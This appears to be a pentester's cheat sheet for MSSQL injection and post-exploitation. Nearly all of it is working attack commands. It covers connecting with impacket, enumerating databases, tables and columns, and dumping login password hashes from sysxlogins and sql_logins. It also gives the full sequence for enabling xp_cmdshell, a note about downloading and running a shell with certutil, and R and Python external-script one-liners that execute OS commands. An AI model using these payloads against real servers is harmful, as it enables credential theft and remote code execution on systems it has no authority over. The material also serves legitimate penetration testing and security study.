MSSQL Injection

Connecting

To connect to open port 1433:
impacket-mssqlclient -p 1433 -windows-auth domain/user:pass@IP

Querying / Exploiting

For MySQL/MSSQL: select @@version can return the version, others will error

check can how many columns: order by x, keep on increasing until error. last number will be number of columns

Concatenating (concatenate put 2 together, STRING_AGG put all the values in one column as one): concat(name1,':',name2) or STRING_AGG(column_name, ',') (only 2017+)

To comment, use xx--

Show all databases: SELECT name FROM master..sysdatabases;
show the database in the current one: SELECT DB_NAME()

Show the table name: SELECT name FROM master..sysobjects WHERE xtype = 'U';
(change xtype to V as well for view)
OR for other DB: SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';

Show the column name if table name is mytable:
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
(For current DB only)

Finally select object use select * from db..table;

See which user: SELECT system_user; OR SELECT user_name();

Check the permissions you have: SELECT * from sys.fn_my_permissions(null, 'database')

Password hash:
MSSQL 2000: SELECT name, password FROM master..sysxlogins
MSSQL 2005: SELECT name, password_hash FROM master.sys.sql_logins
Note: If doesn’t work as expected, use the binary converted:
MSSQL 2000: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
MSSQL 2005: SELECT name + ':' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins

Check if you are sysadmin: SELECT is_srvrolemember('sysadmin');

XP_CMDSHELL (If you are doing SQL injection, can put a valid query then ; as a separator then do all the following, in the end use certutil to download shell and run): EXECUTE sp_configure 'show advanced options', 1;
reconfigure;
EXECUTE sp_configure 'xp_cmdshell', 1;
reconfigure;
EXEC xp_cmdshell 'dir';

If you can execute external script, can run R or Python RCE using the following:
R: EXEC sp_execute_external_script @language=N'R', @script=N'OutputDataSet - data.frame(system("cmd.exe /c ipconfig",intern=T))' WITH RESULT SETS (([cmd_out] text));
Python: EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("ipconfig"))'